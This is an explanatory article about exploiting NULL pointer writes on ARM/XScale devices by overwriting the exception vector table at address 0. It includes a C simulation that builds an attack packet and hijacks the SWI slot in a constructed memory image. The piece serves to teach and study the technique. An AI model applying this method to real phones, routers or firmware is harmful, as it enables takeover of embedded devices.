NULL pointer dereference flaws are generally treated as crash bugs rather than exploitable ones: on a typical hosted operating system the page at address 0 is unmapped, so a write through a NULL pointer simply faults. On the XScale and ARM architectures address 0 is mapped, and it holds the exception vector table: one branch instruction per exception (reset, undefined instruction, software interrupt, prefetch and data abort, IRQ, FIQ). When a flaw writes user-supplied data through a NULL pointer, that write lands on the table, and replacing the branch in a slot that is about to fire (a software interrupt or the next IRQ, for instance) hands execution to the attacker. Two things a practitioner should check before relying on this: ARM lets firmware relocate the vectors to 0xFFFF0000 (the V bit in the CP15 control register; Linux on ARM uses these high vectors), so the target must actually keep its table at 0, and address 0 must be writable from the context in which the faulting code runs.
This method affects a lot of devices, since most mobile phones and PDAs are ARM based (iPhone?) and high-end routers often use the XScale architecture. The PowerPC architecture (used by the Nintendo Wii, Xbox 360 and PlayStation 3) also places its exception vectors at a low address, so it is likely exposed to the same attack.
This attack is more reliable than a remote stack overflow because there are no offsets to guess: the write goes to address 0 every time. The only target-specific data the attacker needs is a copy of the vector table, which can be recovered by downloading the target's firmware and reversing it, so that every slot except the hijacked one can be written back intact and the device keeps running.
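The mechanism described above, as an added worked example (this is not code from the Slashdot post or from Barnaby Jack's work): a constructed 64 KiB flat memory image stands in for an ARM/XScale device whose address 0 holds the exception vector table, a vulnerable packet handler copies attacker bytes through a NULL session pointer, and the attacker's packet is a copy of the firmware's vector table with the SWI slot re-encoded as a `B` to a payload address. The handler layout (0x1000 + slot*0x100), the payload address (0x4000) and the lookup that always fails are assumptions chosen for the example; real vector tables may use `LDR PC, [PC, #off]` rather than `B`, in which case the replacement word is formed accordingly.

```c
/* Added example, not from the original post: NULL write onto an ARM-style
 * vector table at address 0, simulated in a constructed flat memory image. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE      0x10000u   /* constructed 64 KiB "device memory" */
#define VECTOR_SLOTS  8u         /* reset, undef, SWI, pabt, dabt, rsvd, IRQ, FIQ */
#define HANDLER_BASE  0x1000u    /* assumed: legit handler for slot i at 0x1000 + i*0x100 */
#define PAYLOAD_ADDR  0x4000u    /* assumed: where attacker-controlled code already sits */
#define SLOT_SWI      2u
#define SLOT_IRQ      6u

static uint8_t mem[MEM_SIZE];

/* Little-endian helpers, matching the usual ARM/XScale byte order. */
static uint32_t le32_load(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void le32_store(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}
static uint32_t rd32(uint32_t a) { return le32_load(mem + a); }
static void wr32(uint32_t a, uint32_t v) { le32_store(mem + a, v); }

/* Encode 'B target' (cond=AL) for an instruction located at 'from'. ARM reads
 * PC as the instruction address + 8, so imm24 is a word offset from from+8. */
uint32_t arm_encode_b(uint32_t from, uint32_t target) {
    uint32_t off = target - (from + 8);
    return 0xEA000000u | ((off >> 2) & 0x00FFFFFFu);
}

/* Decode the target of a 'B' word at 'at'; 0xFFFFFFFF if it is not B AL. */
uint32_t arm_decode_b(uint32_t at, uint32_t insn) {
    if ((insn & 0xFF000000u) != 0xEA000000u) return 0xFFFFFFFFu;
    uint32_t imm = insn & 0x00FFFFFFu;
    if (imm & 0x00800000u) imm |= 0xFF000000u;   /* sign-extend imm24 */
    return at + 8 + (imm << 2);
}

/* Firmware boot: install the legitimate vector table at address 0. */
void install_vectors(void) {
    memset(mem, 0, sizeof mem);
    for (uint32_t i = 0; i < VECTOR_SLOTS; i++)
        wr32(i * 4, arm_encode_b(i * 4, HANDLER_BASE + i * 0x100));
}

/* Where does exception slot 'slot' currently dispatch to? */
uint32_t vector_target(uint32_t slot) {
    return arm_decode_b(slot * 4, rd32(slot * 4));
}

/* Vulnerable code, modelled on the flaw the summary describes: the session
 * lookup fails and returns NULL (address 0) and the handler copies the packet
 * into the session object without checking. On a hosted OS this faults; on a
 * flat-mapped ARM/XScale device it overwrites the vector table. */
static uint32_t find_session(uint32_t id) { (void)id; return 0; } /* assumed: always "not found" */

void vulnerable_recv(const uint8_t *pkt, size_t len) {
    uint32_t s = find_session(0x1234u);  /* NULL, never checked */
    if (len > MEM_SIZE) len = MEM_SIZE;
    memcpy(mem + s, pkt, len);           /* NULL write lands on the vectors */
}

/* Attacker side: start from a copy of the firmware's vector table (here read
 * from the image, standing in for a dumped firmware), keep every slot but
 * one, and re-point that slot at the payload. Returns the packet length. */
size_t build_attack_packet(uint8_t *out, uint32_t slot, uint32_t payload) {
    if (slot >= VECTOR_SLOTS) return 0;
    memcpy(out, mem, VECTOR_SLOTS * 4);
    le32_store(out + slot * 4, arm_encode_b(slot * 4, payload));
    return VECTOR_SLOTS * 4;
}

/* End-to-end run; returns where the SWI slot dispatches after the attack. */
uint32_t run_attack_demo(void) {
    uint8_t pkt[VECTOR_SLOTS * 4];
    install_vectors();
    size_t n = build_attack_packet(pkt, SLOT_SWI, PAYLOAD_ADDR);
    vulnerable_recv(pkt, n);
    return vector_target(SLOT_SWI);
}

int main(void) {
    install_vectors();
    printf("SWI vector before: 0x%08x\n", vector_target(SLOT_SWI));
    printf("SWI vector after:  0x%08x (IRQ still 0x%08x)\n",
           run_attack_demo(), vector_target(SLOT_IRQ));
    return 0;
}
```

The point the simulation makes concrete is the reliability claim: `vulnerable_recv` never needs an offset, because the destination is the NULL pointer itself, and the packet is nothing more than the dumped table with one word changed, so the other exceptions keep working and the device does not wedge before the hijacked one fires.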
Let me quote Barnaby: "As embedded exploitation is still in its infancy, I don't foresee a worm in the very near future. But yes, if a worm was targeting embedded devices, this would be a reliable attack vector."